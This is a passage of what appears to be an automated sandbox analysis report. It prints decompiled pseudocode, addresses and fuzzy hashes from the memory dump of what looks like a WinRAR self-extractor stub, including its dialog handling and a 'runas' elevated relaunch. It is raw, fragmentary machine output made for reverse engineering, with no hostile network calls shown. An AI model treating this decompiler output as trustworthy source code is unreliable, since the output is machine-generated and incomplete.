                														_t545 = E00CA7BBB(_t100, _t574 + 0x32c0);
                														__eflags = _t545;
                														if(_t545 == 0) {
                															goto L61;
                														}
                														__eflags =  *((char*)(_t706 - 0x219c));
                														if( *((char*)(_t706 - 0x219c)) == 0) {
                															L59:
                															 *(_t706 + 0xf) = 0;
                															goto L61;
                														}
                														_t102 = _t706 - 0x2198; // -6552
                														_t547 = E00CA7B9D(_t102, _t683);
                														__eflags = _t547;
                														if(_t547 == 0) {
                															goto L61;
                														}
                														goto L59;
                													}
                													__eflags = _t692 - _t668;
                													if(_t692 != _t668) {
                														goto L61;
                													}
                													goto L55;
                												}
                												__eflags =  *((char*)(_t398 + 0x6154));
                												if( *((char*)(_t398 + 0x6154)) == 0) {
                													goto L61;
                												}
                												goto L53;
                											}
                											__eflags =  *(_t683 + 0x10f6);
                											if( *(_t683 + 0x10f6) == 0) {
                												goto L50;
                											}
                											 *(_t706 + 0xf) = 1;
                											__eflags =  *(_t574 + 0x3318);
                											if( *(_t574 + 0x3318) == 0) {
                												goto L51;
                											}
                											goto L50;
                										}
                										__eflags = _t692 - _t387;
                										_t388 = 1;
                										if(_t692 != _t387) {
                											goto L46;
                										}
                										goto L45;
                									}
                									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
                									 *(_t706 + 0xb) = _t671;
                									 *(_t706 + 0xc) = _t671;
                									__eflags = _t671;
                									if(_t671 == 0) {
                										goto L214;
                									} else {
                										_t667 = 0;
                										__eflags = 0;
                										goto L43;
                									}
                								}
                								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
                								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
                									goto L29;
                								}
                								__eflags =  *((char*)(_t683 + 0xf1));
                								if( *((char*)(_t683 + 0xf1)) != 0) {
                									goto L219;
                								}
                								goto L29;
                							}
                							if(__eflags < 0) {
                								L25:
                								 *(_t574 + 0x32e0) = _t665;
                								 *(_t574 + 0x32e4) = _t665;
                								goto L26;
                							}
                							__eflags =  *(_t574 + 0x32e0) - _t665;
                							if( *(_t574 + 0x32e0) >= _t665) {
                								goto L26;
                							}
                							goto L25;
                						}
                						if(__eflags < 0) {
                							L21:
                							 *(_t574 + 0x32d8) = _t665;
                							 *(_t574 + 0x32dc) = _t665;
                							goto L22;
                						}
                						__eflags =  *(_t574 + 0x32d8) - _t665;
                						if( *(_t574 + 0x32d8) >= _t665) {
                							goto L22;
                						}
                						goto L21;
                					}
                					__eflags = _t690 - 3;
                					if(_t690 != 3) {
                						L10:
                						__eflags = _t690 - 5;
                						if(_t690 != 5) {
                							goto L217;
                						}
                						__eflags =  *((char*)(_t574 + 0x45ac));
                						if( *((char*)(_t574 + 0x45ac)) == 0) {
                							goto L219;
                						}
                						_push( *(_t706 - 0x18));
                						_push(0);
                						_push(_t683 + 0x10);
                						_push(_t574);
                						_t564 = E00CB80D0(_t665);
                						__eflags = _t564;
                						if(_t564 != 0) {
                							__eflags = 0;
                							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
                							goto L15;
                						} else {
                							E00CA6E03(0xce00e0, 1);
                							goto L219;
                						}
                					}
                					__eflags =  *(_t683 + 0x10f5);
                					if( *(_t683 + 0x10f5) == 0) {
                						goto L217;
                					} else {
                						E00CA79A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
                						goto L10;
                					}
                				}
                				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
                					L4:
                					_t393 = 0;
                					goto L17;
                				}
                				_push(_t370);
                				_push(0);
                				_push(_t683 + 0x10);
                				_push(_t574);
                				if(E00CB80D0(0) != 0) {
                					_t665 = 0;
                					__eflags = 0;
                					goto L6;
                				} else {
                					E00CA6E03(0xce00e0, 1);
                					goto L4;
                				}
                			}
                0x00ca892a
                0x00ca892e
                0x00000000
                0x00000000
                0x00ca8930
                0x00ca8938
                0x00ca8939
                0x00ca8940
                0x00ca895a
                0x00000000
                0x00ca895a
                0x00ca8820
                0x00ca8827
                0x00000000
                0x00000000
                0x00ca882f
                0x00ca883a
                0x00ca883f
                0x00ca8842
                0x00ca8844
                0x00000000
                0x00000000
                0x00ca8846
                0x00ca884d
                0x00000000
                0x00000000
                0x00ca884f
                0x00ca8856
                0x00ca8860
                0x00ca8861
                0x00ca8898
                0x00ca889a
                0x00ca88a6
                0x00ca88ab
                0x00ca88ad
                0x00000000
                0x00ca88ad
                0x00ca8863
                0x00ca8865
                0x00ca8873
                0x00ca8878
                0x00ca887c
                0x00ca8882
                0x00ca8882
                0x00ca8793
                0x00ca8778
                0x00ca877f
                0x00ca8784
                0x00ca878b
                0x00000000
                0x00ca878b
                0x00ca871d
                0x00ca8723
                0x00ca8728
                0x00ca872a
                0x00000000
                0x00000000
                0x00ca872c
                0x00ca8733
                0x00ca8745
                0x00ca8747
                0x00000000
                0x00ca8747
                0x00ca8736
                0x00ca873c
                0x00ca8741
                0x00ca8743
                0x00000000
                0x00000000
                0x00000000
                0x00ca8743
                0x00ca86ec
                0x00ca86ef
                0x00000000
                0x00000000
                0x00000000
                0x00ca86ef
                0x00ca86de
                0x00ca86e5
                0x00000000
                0x00000000
                0x00000000
                0x00ca86e5
                0x00ca86ae
                0x00ca86b5
                0x00000000
                0x00000000
                0x00ca86b7
                0x00ca86bb
                0x00ca86c1
                0x00000000
                0x00000000
                0x00000000
                0x00ca86c1
                0x00ca865f
                0x00ca8662
                0x00ca8664
                0x00000000
                0x00000000
                0x00000000
                0x00ca8664
                0x00ca8636
                0x00ca863c
                0x00ca863f
                0x00ca8642
                0x00ca8644
                0x00000000
                0x00ca864a
                0x00ca864a
                0x00ca864a
                0x00000000
                0x00ca864a
                0x00ca8644
                0x00ca8508
                0x00ca850e
                0x00000000
                0x00000000
                0x00ca8510
                0x00ca8517
                0x00000000
                0x00000000
                0x00000000
                0x00ca8517
                0x00ca84e1
                0x00ca84eb
                0x00ca84eb
                0x00ca84f1
                0x00000000
                0x00ca84f1
                0x00ca84e3
                0x00ca84e9
                0x00000000
                0x00000000
                0x00000000
                0x00ca84e9
                0x00ca84c3
                0x00ca84cd
                0x00ca84cd
                0x00ca84d3
                0x00000000
                0x00ca84d3
                0x00ca84c5
                0x00ca84cb
                0x00000000
                0x00000000
                0x00000000
                0x00ca84cb
                0x00ca842c
                0x00ca842f
                0x00ca844e
                0x00ca844e
                0x00ca8451
                0x00000000
                0x00000000
                0x00ca8457
                0x00ca845e
                0x00000000
                0x00000000
                0x00ca8469
                0x00ca846a
                0x00ca846e
                0x00ca846f
                0x00ca8470
                0x00ca8475
                0x00ca8477
                0x00ca848c
                0x00ca849d
                0x00000000
                0x00ca8479
                0x00ca8480
                0x00000000
                0x00ca8480
                0x00ca8477
                0x00ca8431
                0x00ca8438
                0x00000000
                0x00ca843e
                0x00ca8449
                0x00000000
                0x00ca8449
                0x00ca8438
                0x00ca83f5
                0x00ca8413
                0x00ca8413
                0x00000000
                0x00ca8413
                0x00ca83f7
                0x00ca83f8
                0x00ca83fc
                0x00ca83fd
                0x00ca8405
                0x00ca841a
                0x00ca841a
                0x00000000
                0x00ca8407
                0x00ca840e
                0x00000000
                0x00ca840e

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: 67858c5f540c9df9d4555b529c2f43951e3c336fba911f764d3508c6446c79bf
                • Instruction ID: 7cfed118cf947733c3ef64f94599a442b5eb546e50900f088cfa218293e1464c
                • Opcode Fuzzy Hash: 67858c5f540c9df9d4555b529c2f43951e3c336fba911f764d3508c6446c79bf
                • Instruction Fuzzy Hash: FF82E971904187AFDF15DF64C885BFABBA9AF07308F0841B9E8599B142DB315F88DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBE643() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E00CBE64F); // executed
                				return _t1;
                			}




                0x00cbe648
                0x00cbe64e

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,00CBE084), ref: 00CBE648
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: e2fac75df3f9d664e48721524ddd949b058c2b3d095f3a7e8e073eb45ed91326
                • Instruction ID: 06d85e6211bfab66bbe3564b06978b481c27b7c23d275c0894c631dc1bc21509
                • Opcode Fuzzy Hash: e2fac75df3f9d664e48721524ddd949b058c2b3d095f3a7e8e073eb45ed91326
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 01ad2df191a77ce43c5f6b3331ec658675693cac34313b97361a76ba6f831008
                • Instruction ID: 9c3786ce1cd0d9e056a5a9c30f8ae19de5d6717c4a86214ce78df0c414e76c1d
                • Opcode Fuzzy Hash: 01ad2df191a77ce43c5f6b3331ec658675693cac34313b97361a76ba6f831008
                • Instruction Fuzzy Hash: 13D127B1A043458FDB14CF28C8817DBBBE4BF94308F08056DE8959B642D738EE58CB96
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00CBA5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                				void* __ebx;
                				long _t105;
                				long _t106;
                				struct HWND__* _t107;
                				struct HWND__* _t111;
                				void* _t114;
                				void* _t115;
                				int _t116;
                				void* _t133;
                				void* _t137;
                				signed int _t149;
                				struct HWND__* _t152;
                				void* _t163;
                				void* _t166;
                				int _t169;
                				void* _t182;
                				struct HWND__* _t189;
                				void* _t190;
                				long _t195;
                				void* _t220;
                				signed int _t230;
                				void* _t231;
                				void* _t246;
                				long _t247;
                				long _t248;
                				long _t249;
                				signed int _t254;
                				WCHAR* _t255;
                				int _t259;
                				int _t261;
                				void* _t266;
                				void* _t270;
                				signed short _t275;
                				int _t277;
                				struct HWND__* _t279;
                				WCHAR* _t286;
                				WCHAR* _t288;
                				intOrPtr _t290;
                				void* _t299;
                				void* _t300;
                				struct HWND__* _t302;
                				signed int _t305;
                				void* _t306;
                				struct HWND__* _t308;
                				void* _t310;
                				long _t312;
                				struct HWND__* _t315;
                				struct HWND__* _t316;
                				void* _t317;
                				void* _t319;
                				void* _t321;
                				void* _t323;
                
                				_t299 = __edx;
                				_t285 = __ecx;
                				E00CBD870(E00CD14F6, _t321);
                				E00CBD940();
                				_t275 =  *(_t321 + 0x10);
                				_t305 =  *(_t321 + 0xc);
                				_t302 =  *(_t321 + 8);
                				if(E00CA12D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
                					_t306 = _t305 - 0x110;
                					__eflags = _t306;
                					if(__eflags == 0) {
                						E00CBC343(_t299, __eflags, __fp0, _t302);
                						_t105 =  *0xceb704;
                						_t277 = 1;
                						 *0xce75d8 = _t302;
                						 *0xce75c8 = _t302;
                						__eflags = _t105;
                						if(_t105 != 0) {
                							SendMessageW(_t302, 0x80, 1, _t105); // executed
                						}
                						_t106 =  *0xcf5d04;
                						__eflags = _t106;
                						if(_t106 != 0) {
                							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
                						}
                						_t107 = GetDlgItem(_t302, 0x68);
                						 *(_t321 + 0x14) = _t107;
                						SendMessageW(_t107, 0x435, 0, 0x400000);
                						E00CB95F8(_t321 - 0x1164, 0x800);
                						_t111 = GetDlgItem(_t302, 0x66);
                						__eflags =  *0xce9602;
                						_t308 = _t111;
                						 *(_t321 + 0x10) = _t308;
                						_t286 = 0xce9602;
                						if( *0xce9602 == 0) {
                							_t286 = _t321 - 0x1164;
                						}
                						SetWindowTextW(_t308, _t286);
                						E00CB9A32(_t308); // executed
                						_push(0xce75e4);
                						_push(0xce75e0);
                						_push(0xcfce18);
                						_push(_t302);
                						 *0xce75d6 = 0; // executed
                						_t114 = E00CB9EEF(_t286, _t299, __eflags); // executed
                						__eflags = _t114;
                						if(_t114 == 0) {
                							 *0xce75d1 = _t277;
                						}
                						__eflags =  *0xce75e4;
                						if( *0xce75e4 > 0) {
                							_push(7);
                							_push( *0xce75e0);
                							_push(_t302);
                							E00CBB4C7(_t299);
                						}
                						__eflags =  *0xcfde20;
                						if( *0xcfde20 == 0) {
                							SetDlgItemTextW(_t302, 0x6b, E00CADA42(_t286, 0xbf));
                							SetDlgItemTextW(_t302, _t277, E00CADA42(_t286, 0xbe));
                						}
                						__eflags =  *0xce75e4;
                						if( *0xce75e4 <= 0) {
                							L103:
                							__eflags =  *0xce75d6;
                							if( *0xce75d6 != 0) {
                								L114:
                								__eflags =  *0xce95fc - 2;
                								if( *0xce95fc == 2) {
                									EnableWindow(_t308, 0);
                								}
                								__eflags =  *0xce85f8;
                								if( *0xce85f8 != 0) {
                									E00CA1294(_t302, 0x67, 0);
                									E00CA1294(_t302, 0x66, 0);
                								}
                								_t115 =  *0xce95fc;
                								__eflags = _t115;
                								if(_t115 != 0) {
                									__eflags =  *0xce75d7;
                									if( *0xce75d7 == 0) {
                										_push(0);
                										_push(_t277);
                										_push(0x111);
                										_push(_t302);
                										__eflags = _t115 - _t277;
                										if(_t115 != _t277) {
                											 *0xcddf38();
                										} else {
                											SendMessageW(); // executed
                										}
                									}
                								}
                								__eflags =  *0xce75d1;
                								if( *0xce75d1 != 0) {
                									SetDlgItemTextW(_t302, _t277, E00CADA42(_t286, 0x90));
                								}
                								goto L125;
                							}
                							__eflags =  *0xcfce0c;
                							if( *0xcfce0c != 0) {
                								goto L114;
                							}
                							__eflags =  *0xce95fc;
                							if( *0xce95fc != 0) {
                								goto L114;
                							}
                							__eflags = 0;
                							_t310 = 0xaa;
                							 *((short*)(_t321 - 0x9688)) = 0;
                							do {
                								__eflags = _t310 - 0xaa;
                								if(_t310 != 0xaa) {
                									L109:
                									__eflags = _t310 - 0xab;
                									if(__eflags != 0) {
                										L111:
                										E00CAFA89(__eflags, _t321 - 0x9688, " ", 0x2000);
                										E00CAFA89(__eflags, _t321 - 0x9688, E00CADA42(_t286, _t310), 0x2000);
                										goto L112;
                									}
                									__eflags =  *0xcfde20;
                									if(__eflags != 0) {
                										goto L112;
                									}
                									goto L111;
                								}
                								__eflags =  *0xcfde20;
                								if( *0xcfde20 == 0) {
                									goto L112;
                								}
                								goto L109;
                								L112:
                								_t310 = _t310 + 1;
                								__eflags = _t310 - 0xb0;
                							} while (__eflags <= 0);
                							_t286 =  *0xce75e8; // 0x0
                							E00CB8FE6(_t286, __eflags,  *0xce0064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
                							_t308 =  *(_t321 + 0x10);
                							goto L114;
                						} else {
                							_push(0);
                							_push( *0xce75e0);
                							_push(_t302); // executed
                							E00CBB4C7(_t299); // executed
                							_t133 =  *0xcfce0c;
                							__eflags = _t133;
                							if(_t133 != 0) {
                								__eflags =  *0xce95fc;
                								if(__eflags == 0) {
                									_t288 =  *0xce75e8; // 0x0
                									E00CB8FE6(_t288, __eflags,  *0xce0064,  *(_t321 + 0x14), _t133, 0, 0);
                									L00CC2B4E( *0xcfce0c);
                									_pop(_t286);
                								}
                							}
                							__eflags =  *0xce95fc - _t277;
                							if( *0xce95fc == _t277) {
                								L102:
                								_push(_t277);
                								_push( *0xce75e0);
                								_push(_t302);
                								E00CBB4C7(_t299);
                								goto L103;
                							} else {
                								 *0xcddf3c(_t302);
                								__eflags =  *0xce95fc - _t277;
                								if( *0xce95fc == _t277) {
                									goto L102;
                								}
                								__eflags =  *0xce9601;
                								if( *0xce9601 != 0) {
                									goto L102;
                								}
                								_push(3);
                								_push( *0xce75e0);
                								_push(_t302);
                								E00CBB4C7(_t299);
                								__eflags =  *0xcfde18;
                								if( *0xcfde18 == 0) {
                									goto L102;
                								}
                								_t137 = DialogBoxParamW( *0xce0064, L"LICENSEDLG", 0, E00CBA3E1, 0);
                								__eflags = _t137;
                								if(_t137 == 0) {
                									L25:
                									 *0xce75d7 = _t277;
                									L26:
                									_push(_t277);
                									L13:
                									EndDialog(_t302, ??); // executed
                									L125:
                									_t116 = _t277;
                									L126:
                									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
                									return _t116;
                								}
                								goto L102;
                							}
                						}
                					}
                					__eflags = _t306 != 1;
                					if(_t306 != 1) {
                						L7:
                						_t116 = 0;
                						goto L126;
                					}
                					_t149 = (_t275 & 0x0000ffff) - 1;
                					__eflags = _t149;
                					if(_t149 == 0) {
                						__eflags =  *0xce75d0;
                						if( *0xce75d0 != 0) {
                							L23:
                							_t312 = 0x800;
                							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
                							__eflags =  *0xce75d0;
                							if( *0xce75d0 == 0) {
                								__eflags =  *0xce75d1;
                								if( *0xce75d1 == 0) {
                									_t152 = GetDlgItem(_t302, 0x68);
                									__eflags =  *0xce75cc;
                									_t279 = _t152;
                									if( *0xce75cc == 0) {
                										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
                										SendMessageW(_t279, 0xc2, 0, 0xcd22e4);
                										_t312 = 0x800;
                									}
                									SetFocus(_t279);
                									__eflags =  *0xce85f8;
                									if( *0xce85f8 == 0) {
                										E00CAFAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
                										E00CBC10F(_t285, _t321 - 0x1164, _t312);
                										E00CA3E41(_t321 - 0x4288, 0x880, E00CADA42(_t285, 0xb9), _t321 - 0x1164);
                										_t323 = _t323 + 0x10;
                										_t163 = _t321 - 0x4288;
                									} else {
                										_t163 = E00CADA42(_t285, 0xba);
                									}
                									E00CBC190(0, _t163);
                									__eflags =  *0xce9601;
                									if( *0xce9601 == 0) {
                										E00CBC7FC(_t321 - 0x2164);
                									}
                									_push(0);
                									_push(_t321 - 0x2164);
                									 *(_t321 + 0x17) = 0;
                									_t166 = E00CA9D3A(0, _t321);
                									_t277 = 1;
                									__eflags = _t166;
                									if(_t166 != 0) {
                										L40:
                										_t300 = E00CB9A8D(_t321 - 0x2164);
                										 *((char*)(_t321 + 0x13)) = _t300;
                										__eflags = _t300;
                										if(_t300 != 0) {
                											L43:
                											_t169 =  *(_t321 + 0x17);
                											L44:
                											_t285 =  *0xce9601;
                											__eflags = _t285;
                											if(_t285 != 0) {
                												L50:
                												__eflags =  *((char*)(_t321 + 0x13));
                												if( *((char*)(_t321 + 0x13)) != 0) {
                													 *0xce75dc = _t277;
                													E00CA12B2(_t302, 0x67, 0);
                													E00CA12B2(_t302, 0x66, 0);
                													SetDlgItemTextW(_t302, _t277, E00CADA42(_t285, 0xe6)); // executed
                													E00CA12B2(_t302, 0x69, _t277);
                													SetDlgItemTextW(_t302, 0x65, 0xcd22e4); // executed
                													_t315 = GetDlgItem(_t302, 0x65);
                													__eflags = _t315;
                													if(_t315 != 0) {
                														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
                														__eflags = _t195;
                														SetWindowLongW(_t315, 0xfffffff0, _t195);
                													}
                													_push(5);
                													_push( *0xce75e0);
                													_push(_t302);
                													E00CBB4C7(_t300);
                													_push(2);
                													_push( *0xce75e0);
                													_push(_t302);
                													E00CBB4C7(_t300);
                													_push(0xcfce18);
                													_push(_t302);
                													 *0xcffe3c = _t277; // executed
                													E00CBC6FF(_t285, __eflags); // executed
                													_push(6);
                													_push( *0xce75e0);
                													 *0xcffe3c = 0;
                													_push(_t302);
                													E00CBB4C7(_t300);
                													__eflags =  *0xce75d7;
                													if( *0xce75d7 == 0) {
                														__eflags =  *0xce75cc;
                														if( *0xce75cc == 0) {
                															__eflags =  *0xcfde2c;
                															if( *0xcfde2c == 0) {
                																_push(4);
                																_push( *0xce75e0);
                																_push(_t302);
                																E00CBB4C7(_t300);
                															}
                														}
                													}
                													E00CA1294(_t302, _t277, _t277);
                													 *0xce75dc =  *0xce75dc & 0x00000000;
                													__eflags =  *0xce75dc;
                													_t182 =  *0xce75d7; // 0x1
                													goto L75;
                												}
                												__eflags = _t285;
                												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
                												__eflags = _t169;
                												L52:
                												__eflags = _t169;
                												 *(_t321 + 0x17) = _t169 == 0;
                												__eflags = _t169;
                												if(_t169 == 0) {
                													L66:
                													__eflags =  *(_t321 + 0x17);
                													if( *(_t321 + 0x17) != 0) {
                														_push(E00CADA42(_t285, 0x9a));
                														E00CA3E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
                														E00CA6E03(0xce00e0, _t277);
                														E00CB9735(_t302, _t321 - 0x5688, E00CADA42(0xce00e0, 0x96), 0x30);
                														 *0xce75cc =  *0xce75cc + 1;
                													}
                													L12:
                													_push(0);
                													goto L13;
                												}
                												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
                												_t285 = 0xceb602;
                												E00CAE7AA(0xceb602, _t321 - 0x164, 0x80);
                												_push(0xcea602);
                												E00CA3E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
                												_t323 = _t323 + 0x14;
                												 *(_t321 - 0x48) = 0x3c;
                												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
                												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
                												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
                												 *(_t321 - 0x40) = _t302;
                												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
                												 *(_t321 - 0x2c) = _t277;
                												 *((intOrPtr*)(_t321 - 0x28)) = 0;
                												 *((intOrPtr*)(_t321 - 0x30)) = 0xce75f8;
                												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
                												 *(_t321 + 8) = _t317;
                												__eflags = _t317;
                												if(_t317 == 0) {
                													 *(_t321 + 0x10) =  *(_t321 + 0x14);
                												} else {
                													 *0xcf5d08 = 0;
                													_t231 = GetCommandLineW();
                													__eflags = _t231;
                													if(_t231 != 0) {
                														E00CAFAB1(0xcf5d0a, _t231, 0x2000);
                													}
                													E00CBA24E(_t285, 0xcf9d0a, 7);
                													E00CBA24E(_t285, 0xcfad0a, 2);
                													E00CBA24E(_t285, 0xcfbd0a, 0x10);
                													 *0xcfce0b = _t277;
                													_t285 = 0xcfcd0a;
                													E00CAE90C(_t277, 0xcfcd0a, _t321 - 0x164);
                													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
                													E00CBEA80(_t238, 0xcf5d08, 0x7104);
                													_t323 = _t323 + 0xc;
                												}
                												_t220 = ShellExecuteExW(_t321 - 0x48);
                												E00CAE957(_t321 - 0x164, 0x80);
                												E00CAE957(_t321 - 0x11ca0, 0x430c);
                												__eflags = _t220;
                												if(_t220 == 0) {
                													_t319 =  *(_t321 + 0x10);
                													 *(_t321 + 0x17) = _t277;
                													goto L64;
                												} else {
                													 *0xcddf20( *(_t321 - 0x10), 0x2710);
                													_t71 = _t321 + 0xc;
                													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
                													__eflags =  *_t71;
                													_t319 =  *(_t321 + 0x10);
                													while(1) {
                														__eflags =  *_t319;
                														if( *_t319 != 0) {
                															break;
                														}
                														Sleep(0x64);
                														_t230 =  *(_t321 + 0xc) + 1;
                														 *(_t321 + 0xc) = _t230;
                														__eflags = _t230 - 0x64;
                														if(_t230 < 0x64) {
                															continue;
                														}
                														break;
                													}
                													 *0xcfde2c =  *(_t321 - 0x10);
                													L64:
                													__eflags =  *(_t321 + 8);
                													if( *(_t321 + 8) != 0) {
                														UnmapViewOfFile(_t319);
                														CloseHandle( *(_t321 + 8));
                													}
                													goto L66;
                												}
                											}
                											__eflags = _t300;
                											if(_t300 == 0) {
                												goto L52;
                											}
                											E00CA3E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
                											_t323 = _t323 + 0x10;
                											E00CA943C(_t321 - 0x3188);
                											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
                											_push(0x11);
                											_push(_t321 - 0x1164);
                											_t246 = E00CA9528(_t321 - 0x3188);
                											 *((char*)(_t321 + 0x13)) = _t246;
                											__eflags = _t246;
                											if(_t246 == 0) {
                												_t247 = GetLastError();
                												__eflags = _t247 - 5;
                												if(_t247 == 5) {
                													 *(_t321 + 0x17) = _t277;
                												}
                											}
                											_t39 = _t321 - 4;
                											 *_t39 =  *(_t321 - 4) | 0xffffffff;
                											__eflags =  *_t39;
                											_t169 = E00CA946E(_t321 - 0x3188); // executed
                											_t285 =  *0xce9601;
                											goto L50;
                										}
                										_t248 = GetLastError();
                										_t300 =  *((intOrPtr*)(_t321 + 0x13));
                										__eflags = _t248 - 5;
                										if(_t248 != 5) {
                											goto L43;
                										}
                										_t169 = _t277;
                										 *(_t321 + 0x17) = _t169;
                										goto L44;
                									} else {
                										_t249 = GetLastError();
                										__eflags = _t249 - 5;
                										if(_t249 == 5) {
                											L39:
                											 *(_t321 + 0x17) = _t277;
                											goto L40;
                										}
                										__eflags = _t249 - 3;
                										if(_t249 != 3) {
                											goto L40;
                										}
                										goto L39;
                									}
                								} else {
                									_t277 = 1;
                									_t182 = 1;
                									 *0xce75d7 = 1;
                									L75:
                									__eflags =  *0xce75cc;
                									if( *0xce75cc <= 0) {
                										goto L26;
                									}
                									__eflags = _t182;
                									if(_t182 != 0) {
                										goto L26;
                									}
                									 *0xce75d0 = _t277;
                									SetDlgItemTextW(_t302, _t277, E00CADA42(_t285, 0x90));
                									_t290 =  *0xce00e0; // 0x0
                									__eflags = _t290 - 9;
                									if(_t290 != 9) {
                										__eflags = _t290 - 3;
                										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
                										__eflags = _t189;
                										 *(_t321 + 0x14) = _t189;
                										_t316 = _t189;
                									} else {
                										_t316 = 0xa0;
                									}
                									_t190 = E00CADA42(_t290, 0x96);
                									E00CB9735(_t302, E00CADA42(_t290, _t316), _t190, 0x30);
                									goto L125;
                								}
                							}
                							_t277 = 1;
                							__eflags =  *0xce75d1;
                							if( *0xce75d1 == 0) {
                								goto L26;
                							}
                							goto L25;
                						}
                						__eflags =  *0xcffe3c;
                						if( *0xcffe3c == 0) {
                							goto L23;
                						} else {
                							__eflags =  *0xcffe3d;
                							_t254 = _t149 & 0xffffff00 |  *0xcffe3d == 0x00000000;
                							__eflags = _t254;
                							 *0xcffe3d = _t254;
                							_t255 = E00CADA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
                							_t277 = 1;
                							SetDlgItemTextW(_t302, 1, _t255);
                							while(1) {
                								__eflags =  *0xcffe3d;
                								if( *0xcffe3d == 0) {
                									goto L125;
                								}
                								__eflags =  *0xce75d7;
                								if( *0xce75d7 != 0) {
                									goto L125;
                								}
                								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
                								__eflags = _t259;
                								if(_t259 == 0) {
                									goto L125;
                								} else {
                									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
                									__eflags = _t261;
                									if(_t261 == 0) {
                										TranslateMessage(_t321 - 0x64);
                										DispatchMessageW(_t321 - 0x64);
                									}
                									continue;
                								}
                							}
                							goto L125;
                						}
                					}
                					_t266 = _t149 - 1;
                					__eflags = _t266;
                					if(_t266 == 0) {
                						_t277 = 1;
                						__eflags =  *0xce75dc;
                						 *0xce75d7 = 1;
                						if( *0xce75dc == 0) {
                							goto L12;
                						}
                						__eflags =  *0xce75cc;
                						if( *0xce75cc != 0) {
                							goto L125;
                						}
                						goto L12;
                					}
                					__eflags = _t266 == 0x65;
                					if(_t266 == 0x65) {
                						_t270 = E00CA1217(_t302, E00CADA42(_t285, 0x64), _t321 - 0x1164);
                						__eflags = _t270;
